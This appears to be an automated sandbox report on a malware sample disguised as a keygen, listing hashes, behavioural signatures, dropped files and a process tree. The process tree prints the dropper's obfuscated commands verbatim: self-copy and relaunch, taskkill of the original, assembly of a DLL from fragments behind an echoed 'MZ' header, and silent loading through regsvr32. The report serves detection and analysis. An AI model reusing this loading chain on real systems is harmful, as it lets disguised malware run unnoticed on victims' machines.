Overview
overview
10Static
static
10keygen-pr.exe
windows7_x64
1keygen-pr.exe
windows10_x64
1keygen-step-1.exe
windows7_x64
10keygen-step-1.exe
windows10_x64
10keygen-step-3.exe
windows7_x64
7keygen-step-3.exe
windows10_x64
1keygen-step-4.exe
windows7_x64
10keygen-step-4.exe
windows10_x64
keygen-step-5.exe
windows7_x64
8keygen-step-5.exe
windows10_x64
8keygen-step-6.exe
windows7_x64
7keygen-step-6.exe
windows10_x64
6keygen.bat
windows7_x64
10keygen.bat
windows10_x64
Analysis
-
max time kernel
631s -
max time network
678s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
11-07-2021 14:10
Static task
static1
Behavioral task
behavioral1
Sample
keygen-pr.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
keygen-pr.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
keygen-step-1.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
keygen-step-1.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
keygen-step-3.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
keygen-step-3.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
keygen-step-4.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
keygen-step-4.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
keygen-step-5.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
keygen-step-5.exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
keygen-step-6.exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
keygen-step-6.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
keygen.bat
Resource
win7v20210408
General
-
Target
keygen-step-5.exe
-
Size
1.1MB
-
MD5
747f74fabfd75d98062a485981249675
-
SHA1
ae0f1726911463f6711f0f4077aaf0675e0f732a
-
SHA256
21517fbbdbdf6d0b77e35c00736adbeb025cb7050792ada79fb534c5733298c0
-
SHA512
7b790e759ea136534624366b693bf9f27919f58d987490500db0bd2ffba1406196fb0ec7c8e5121f8347f9aab49ef9f0c813025a19183d772e68f5350dccac4e
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Ee_SxWP.ExEpid process 1932 Ee_SxWP.ExE -
Loads dropped DLL 2 IoCs
Processes:
cmd.exeregsvr32.exepid process 1956 cmd.exe 1464 regsvr32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
regsvr32.exepid process 1464 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1060 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 1060 taskkill.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
keygen-step-5.execmd.exeEe_SxWP.ExEcmd.exedescription pid process target process PID 1728 wrote to memory of 1956 1728 keygen-step-5.exe cmd.exe PID 1728 wrote to memory of 1956 1728 keygen-step-5.exe cmd.exe PID 1728 wrote to memory of 1956 1728 keygen-step-5.exe cmd.exe PID 1728 wrote to memory of 1956 1728 keygen-step-5.exe cmd.exe PID 1956 wrote to memory of 1932 1956 cmd.exe Ee_SxWP.ExE PID 1956 wrote to memory of 1932 1956 cmd.exe Ee_SxWP.ExE PID 1956 wrote to memory of 1932 1956 cmd.exe Ee_SxWP.ExE PID 1956 wrote to memory of 1932 1956 cmd.exe Ee_SxWP.ExE PID 1956 wrote to memory of 1060 1956 cmd.exe taskkill.exe PID 1956 wrote to memory of 1060 1956 cmd.exe taskkill.exe PID 1956 wrote to memory of 1060 1956 cmd.exe taskkill.exe PID 1956 wrote to memory of 1060 1956 cmd.exe taskkill.exe PID 1932 wrote to memory of 1744 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1744 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1744 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1744 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1100 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1100 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1100 1932 Ee_SxWP.ExE cmd.exe PID 1932 wrote to memory of 1100 1932 Ee_SxWP.ExE cmd.exe PID 1100 wrote to memory of 1640 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 1640 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 1640 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 1640 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 652 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 652 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 652 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 652 1100 cmd.exe cmd.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe PID 1100 wrote to memory of 1464 1100 cmd.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C CopY /y"C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ..\Ee_SxWP.ExE> nUl &&START ..\EE_sxWP.ExE /pyJcP63I6SaeVP58 &iF"" == "" for %zin ( "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ) do taskkill /F -im "%~nXz" > nUl2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE..\EE_sxWP.ExE /pyJcP63I6SaeVP583⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C CopY /y"C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE" ..\Ee_SxWP.ExE> nUl &&START ..\EE_sxWP.ExE /pyJcP63I6SaeVP58 &iF"/pyJcP63I6SaeVP58 " == "" for %zin ( "C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE" ) do taskkill /F -im "%~nXz" > nUl4⤵PID:1744
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c eChO Sl%RAnDom%b~C:\Users\Admin\AppData\Local\TempQ7C:\Users\Admin\AppData\Local\Tempn91> D7eYTR7e.XlX & eCho | sET /p = "MZ" > 85eRUS.S& Copy/Y /B 85erUs.S + K3w0pUAv.Bm + 7KOV.ZNS + EXQJRWMh.T + 1GLEMCQ.a + B~FB768.3_H + FKIlLQgE._ + YFp7m._OF + UzRt7.T1 +FNh1Wg6.Px8+ FKQURPz.6X8 +kWjJB5.HP + rX8pQRM.lR+ D7eYTR7E.XLX ..\oZIe4.4p>nuL & dEL /Q * > nUL&stArt regsvr32 ..\oZIE4.4P /s4⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "5⤵PID:1640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>85eRUS.S"5⤵PID:652
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\oZIE4.4P /s5⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:1464 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -im "keygen-step-5.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExEMD5
747f74fabfd75d98062a485981249675
SHA1ae0f1726911463f6711f0f4077aaf0675e0f732a
SHA25621517fbbdbdf6d0b77e35c00736adbeb025cb7050792ada79fb534c5733298c0
SHA5127b790e759ea136534624366b693bf9f27919f58d987490500db0bd2ffba1406196fb0ec7c8e5121f8347f9aab49ef9f0c813025a19183d772e68f5350dccac4e
-
C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExEMD5
747f74fabfd75d98062a485981249675
SHA1ae0f1726911463f6711f0f4077aaf0675e0f732a
SHA25621517fbbdbdf6d0b77e35c00736adbeb025cb7050792ada79fb534c5733298c0
SHA5127b790e759ea136534624366b693bf9f27919f58d987490500db0bd2ffba1406196fb0ec7c8e5121f8347f9aab49ef9f0c813025a19183d772e68f5350dccac4e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\1GLeMCq.aMD5
2f40294d2446b8074f9a2872766ac0c0
SHA170a76f08d84425b1c913783db3c0aa31a72d85f8
SHA25651fa5a0360075fb4ea66ee8d839def7d05a274230e7c24b4eeef83136d3a7e98
SHA5122c7d714de3de2a037810c63ad0956581e6de339d079531083f2b0de2cedeb2be3c91bb707e6e3c4ba1643942e08b73f76c53f9d2dfcf45f14255a29acd47b4ff
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\7koV.zNsMD5
0a530d6c84051ba82073cfb26d7bdf5d
SHA181f8d160f7d0dc87e228994d63bc2fb5fa555134
SHA2569233aa84477b2ba3bfa971fc7eb5613fd479999e6800c734d408996b9a74aeb6
SHA5127bd5efa3c56e8eb60c5897bf8268a4f2a9c6fa615ecca4bc2b3425b8fe4f42e0c91e9ba9a656ddfa935fc1b7e753c1500494b18ee4a6c45f6c4c5b15d99780e1
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\85eRUS.SMD5
ac6ad5d9b99757c3a878f2d275ace198
SHA1439baa1b33514fb81632aaf44d16a9378c5664fc
SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\EXqJRWMh.TMD5
c3ab882cb9bfe35a8c19133e83d07d41
SHA14e9a8f991248cac978f649cf674a772553fe2c0d
SHA25699efe31a4f8b36a887c640c6049c4bd7112dda7a4986be3afe0c50f0f50a7cfb
SHA512ef10ce9fe510da13b68dcc93034ac6fb1bac83a9ce035938af0c38911fc7c5f77774ba025a21d086791ce0e811000bdda68b1dc35821a6d9cd82652b76c2f1cf
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\FKilLQge._MD5
9edf0359b4f5dc3fb9dcb01163f51d47
SHA1a562f422ed8a9a7a20c63ed0e6c6865b224b2566
SHA25681544954e0da023a998868b7e9108202ade8e6f9738d180bbf5304b1bfec4b47
SHA5126cd0d076545a958ad1162d1486bae9a54bfdcc5493db5e23960a40430c986c0d81484cd2311764da99824f008aecbb87b2e9c846ca4c116278f8236aa4f84c00
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\FNh1Wg6.Px8MD5
ddec222bb7b12164d815b00c28c7eebb
SHA1049dd6260ccb115d4d1a725decad59c47356959f
SHA256ff3feacaa942ea7feb8d6b14cdd2aadc208583f023e612d97534333335f869aa
SHA5121479411e92915a5a083f463de4b8410404c3b7207868a5c6aef3e7cda63a658b8795c7e4a513c2896d4cd5051ade0fe786afd6f6cc01e9adbbca4a78884b89f4
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\b~FB768.3_hMD5
42ce37cb43a9640686f7eb00777f093d
SHA1860249c320c159ed311763ba80617e84030adbac
SHA25657f0652f473a30341fec445559c28e58e2fa437e7eb1f3ac3606a0050f8862a6
SHA512a0c7191140fab59e551752e28252c2eb1f90664aab734edffeb584f2547528bc1f89192e3abd71b93bd94cf2e7bfebe2e99607ea3461b0fdfa365251ebf71bfc
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fKqURPz.6x8MD5
c2115b894512d75d4f2abca6d35eb857
SHA11748fc0c269a6c3e24c6aae878eb7ad99e78d908
SHA256625a388cdd06fad938da13d84452a214c24af56737eeda6cc382f22f22ea6fe7
SHA512d0618680c52a478948c3f8f3af617ea848aa083d9c72b464a11fb6d72891873e828612674c648cce641ee667c42bca37e08866bcac2da7ddd641f1bed2f40e77
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\k3w0puAv.bmMD5
23ccc964fe6f303f7895bcd44a198824
SHA1b15dd3e4d469567ef4400584a2c25e09d693bcd2
SHA25643820768d00b3e718e23b10cef1d51ca69372ed845307ce9e52acd5bb4a43bac
SHA51217d4cb773cf990ba62054e784c6572c2b0aaaf1d937d7bf1e1b086dbd346dab7d43902b04179afd4fd160059c7a57a6e923721e44661bae52d0bffaadf93ec9e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kwjJB5.HpMD5
cc73d1e911c166dbcd78282dc347f87e
SHA191bb48fc7dcfc0002c64eaaa1a7e2b77ff1f8d17
SHA2561505ebabaaaf7aa27f6f550d4e8fc9bd50ae471cc2040467b4054e2617ec3c6a
SHA51217476da0429752ba1aa198044ef21cb6e31c16c67bb59d2cddf40dcc594e618a0db9bc0648d90be4c7157bfc04ba2e7adfa2de069a9c0e38478635bb86441c2e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\rX8pqRM.lRMD5
3a0b90c9cb9df3427f0280a9119d24b6
SHA1495d99e16070bfd0e0c62ca5fd2ba5806c528991
SHA2563cc1dd0155637ba2a3b9a82dcb011ce3cdea794784bdd308903f696e76f4ddb1
SHA512a23ad9597d91a97273bc6f87378021ecf14d1c882db8181c510938cb8434ed05dd929a8af2e8bf7c0d7affdb60cba149566d4f970e3f4daf3a2aa2a408da618f
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\uzRt7.t1MD5
53df1d38fb65cb44f4adf13275e24d27
SHA1e201716331bcfb1dbfd8693d0d2537162f01ad2b
SHA2562f3332a9c90b0f54da8497c144bae06d5167b10cd3280fe134b6da68cadad4a9
SHA5126e5db981716bd693283458511f0943cba0521ff37b329c55c78b1b8c52edf580223c0381e847b73cce245a5307605478a457049408b3711f25f99c2824981c31
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yFp7m._oFMD5
fb09b4c1e4cb3f5e403d110ae6ebfff3
SHA1d071d257fc12cbea09a356f7e33a5a540ab15d6d
SHA2566c158e9ea3ad11d1b7422a5076ba93399069012c7545c601d9570314ae809e3d
SHA512ce4d6e697349719af91a4837ee7bb295e644211211d6cedb74554c60b2ea847623cfa4bafcda99b744817e7d993373d24d90f8ddd940f7af085ccf99f286c9d7
-
C:\Users\Admin\AppData\Local\Temp\oZIE4.4PMD5
e9750c09e0a54aeedc03255403287aa8
SHA136a3aeab6d03d673effdfbd283d68d2d47ca0f64
SHA25679392d4c74e860dee61c7aee6d1ec3f35053416762bcba3add27a57e19967403
SHA5122fb5e78a74f1e33b5bd95c8ec55b100ca8d01a4f3e7a87aaf7d20b99e15426b2c4f7da07b7129d77974dc74de288539710159f3f3926642abd3d2fa5e69da87a
-
\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExEMD5
747f74fabfd75d98062a485981249675
SHA1ae0f1726911463f6711f0f4077aaf0675e0f732a
SHA25621517fbbdbdf6d0b77e35c00736adbeb025cb7050792ada79fb534c5733298c0
SHA5127b790e759ea136534624366b693bf9f27919f58d987490500db0bd2ffba1406196fb0ec7c8e5121f8347f9aab49ef9f0c813025a19183d772e68f5350dccac4e
-
\Users\Admin\AppData\Local\Temp\oZIe4.4pMD5
e9750c09e0a54aeedc03255403287aa8
SHA136a3aeab6d03d673effdfbd283d68d2d47ca0f64
SHA25679392d4c74e860dee61c7aee6d1ec3f35053416762bcba3add27a57e19967403
SHA5122fb5e78a74f1e33b5bd95c8ec55b100ca8d01a4f3e7a87aaf7d20b99e15426b2c4f7da07b7129d77974dc74de288539710159f3f3926642abd3d2fa5e69da87a
-
memory/652-70-0x0000000000000000-mapping.dmp
-
memory/1060-64-0x0000000000000000-mapping.dmp
-
memory/1100-68-0x0000000000000000-mapping.dmp
-
memory/1464-89-0x0000000000130000-0x0000000000131000-memory.dmpFilesize
4KB
-
memory/1464-84-0x0000000000000000-mapping.dmp
-
memory/1464-88-0x0000000001FB0000-0x0000000002109000-memory.dmpFilesize
1.3MB
-
memory/1464-91-0x00000000030A0000-0x0000000003154000-memory.dmpFilesize
720KB
-
memory/1464-90-0x0000000002FB0000-0x000000000309E000-memory.dmpFilesize
952KB
-
memory/1464-92-0x0000000003160000-0x000000000320C000-memory.dmpFilesize
688KB
-
memory/1464-93-0x0000000003210000-0x00000000032A9000-memory.dmpFilesize
612KB
-
memory/1464-94-0x0000000003210000-0x00000000032A9000-memory.dmpFilesize
612KB
-
memory/1640-69-0x0000000000000000-mapping.dmp
-
memory/1728-59-0x00000000753E1000-0x00000000753E3000-memory.dmpFilesize
8KB
-
memory/1744-67-0x0000000000000000-mapping.dmp
-
memory/1932-62-0x0000000000000000-mapping.dmp
-
memory/1956-60-0x0000000000000000-mapping.dmp